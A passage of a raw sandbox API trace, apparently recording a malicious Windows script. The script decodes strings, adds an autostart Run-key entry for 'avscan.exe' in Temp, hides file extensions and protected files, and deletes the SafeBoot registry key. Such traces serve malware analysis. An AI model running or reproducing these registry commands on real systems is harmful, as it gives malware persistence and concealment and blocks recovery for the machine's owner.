[0169.456] VarCat (in: pvarLeft=0x28fa40, pvarRight=0x28f9b0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.456] VarAdd (in: pvarLeft=0x28f9a0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0169.457] VarCat (in: pvarLeft=0x28fa40, pvarRight=0x28f9b0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.457] VarAdd (in: pvarLeft=0x28f9a0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0169.457] VarCat (in: pvarLeft=0x28fa40, pvarRight=0x28f9b0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="B", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.458] VarAdd (in: pvarLeft=0x28f9a0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0169.458] VarCat (in: pvarLeft=0x28fa40, pvarRight=0x28f9b0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="E", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.459] VarAdd (in: pvarLeft=0x28f9a0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x116845c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0169.459] VarCat (in: pvarLeft=0x28fa40, pvarRight=0x28f9b0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0169.460] VarAdd (in: pvarLeft=0x28f9a0, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0169.460] VarCat (in: pvarLeft=0x28fa40, pvarRight=0x28f9b0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.460] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f9c0, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0169.460] FileSystemObject:IDispatch:Invoke (in: This=0xf22c3c, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f5fc*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f838, pExcepInfo=0x28f5dc, puArgErr=0x28f60c | out: pDispParams=0x28f5fc*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f838*(varType=0x8, wReserved1=0x0, wReserved2=0xf9a0, wReserved3=0x28, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f5dc*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f60c*=0x11527dc) returned 0x0 [0169.461] VarCat (in: pvarLeft=0x28f838, pvarRight=0x28f9d0, pvarResult=0x28f828 | out: pvarResult=0x28f828) returned 0x0 [0169.462] WshShell:IDispatch:GetIDsOfNames (in: This=0xf22d38, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f61c*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f620 | out: rgDispId=0x28f620*=2001) returned 0x0 [0172.001] WshShell:IDispatch:Invoke (in: This=0xf22d38, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f5f0*(rgvarg=([0]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0xf848, wReserved3=0x28, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", varVal2=0x28facc), [1]=0x28f648*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\avscan", varVal2=0x753af0d0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5d0, puArgErr=0x28f600 | out: pDispParams=0x28f5f0*(rgvarg=([0]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0xf848, wReserved3=0x28, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", varVal2=0x28facc), [1]=0x28f648*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\avscan", varVal2=0x753af0d0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5d0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f600*=0x72a478d9) returned 0x0 [0172.003] WshShell:IDispatch:GetIDsOfNames (in: This=0xf22d38, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f60c*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f610 | out: rgDispId=0x28f610*=2001) returned 0x0 [0172.003] WshShell:IDispatch:Invoke (in: This=0xf22d38, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f940*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0, puArgErr=0x28f5f0 | out: pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f940*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f5f0*=0x72a478d9) returned 0x0 [0172.004] WshShell:IDispatch:GetIDsOfNames (in: This=0xf22d38, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f60c*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f610 | out: rgDispId=0x28f610*=2001) returned 0x0 [0172.004] WshShell:IDispatch:Invoke (in: This=0xf22d38, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f8b0*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\SuperHidden", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0, puArgErr=0x28f5f0 | out: pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f8b0*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\SuperHidden", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f5f0*=0x72a478d9) returned 0x0 [0172.005] WshShell:IDispatch:GetIDsOfNames (in: This=0xf22d38, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f60c*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f610 | out: rgDispId=0x28f610*=2001) returned 0x0 [0172.015] WshShell:IDispatch:Invoke (in: This=0xf22d38, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f880*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0, puArgErr=0x28f5f0 | out: pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f880*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f5f0*=0x72a478d9) returned 0x0 [0172.016] WshShell:IDispatch:GetIDsOfNames (in: This=0xf22d38, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f60c*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f610 | out: rgDispId=0x28f610*=2001) returned 0x0 [0172.017] WshShell:IDispatch:Invoke (in: This=0xf22d38, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f8e0*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\DefaultValue", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0, puArgErr=0x28f5f0 | out: pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f8e0*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\DefaultValue", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f5f0*=0x72a478d9) returned 0x0 [0172.018] WshShell:IDispatch:GetIDsOfNames (in: This=0xf22d38, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f60c*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f610 | out: rgDispId=0x28f610*=2001) returned 0x0 [0172.018] WshShell:IDispatch:Invoke (in: This=0xf22d38, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f990*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\UncheckedValue", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0, puArgErr=0x28f5f0 | out: pDispParams=0x28f5e0*(rgvarg=([0]=0x28f628*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28fa40*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753af0d0), varVal2=0x0), [1]=0x28f638*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f648*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f990*(varType=0x8, wReserved1=0x0, wReserved2=0xf644, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\UncheckedValue", varVal2=0x753af0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f5c0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f5f0*=0x72a478d9) returned 0x0 [0172.019] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="REG DELETE HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28f5f4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f638 | out: lpCommandLine="REG DELETE HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot /f", lpProcessInformation=0x28f638*(hProcess=0x178, hThread=0x174, dwProcessId=0xcd0, dwThreadId=0xccc)) returned 1 [0172.198] GetLastError () returned 0x0 [0172.198] WaitForInputIdle (hProcess=0x178, dwMilliseconds=0x2710) returned 0xffffffff [0172.199] CloseHandle (hObject=0x174) returned 1 [0172.199] CloseHandle (hObject=0x178) returned 1 [0172.199] FileSystemObject:IUnknown:Release (This=0xf22be0) returned 0x0 [0172.200] FileSystemObject:IUnknown:Release (This=0xf22c3c) returned 0x0 [0172.202] WshShell:IUnknown:Release (This=0xf22d38) returned 0x0 [0172.204] CLSIDFromProgIDEx (in: lpszProgID="scripting.filesystemobject", lpclsid=0x28f420 | out: lpclsid=0x28f420*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0172.204] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0172.204] CoCreateInstance (in: rclsid=0x28f420*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28f4c4 | out: ppv=0x28f4c4*=0xf22be0) returned 0x0 [0172.358] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x28f4d4 | out: ppvObject=0x28f4d4*=0x0) returned 0x80004002 [0172.358] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x28f4d8 | out: ppvObject=0x28f4d8*=0x0) returned 0x80004002 [0172.358] FileSystemObject:IUnknown:QueryInterface (in: This=0xf22be0, riid=0x72970450*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28f4a4 | out: ppvObject=0x28f4a4*=0xf22be0) returned 0x0 [0172.358] FileSystemObject:IUnknown:Release (This=0xf22be0) returned 0x1 [0172.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.359] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x11684d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.360] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f810, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.360] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.360] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f810, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.361] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1168434, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.361] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f810, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.362] VarSub (in: pvarLeft=0x28f8d0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0x11684d4, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0172.362] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f810, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.363] WideCharToMultiByte 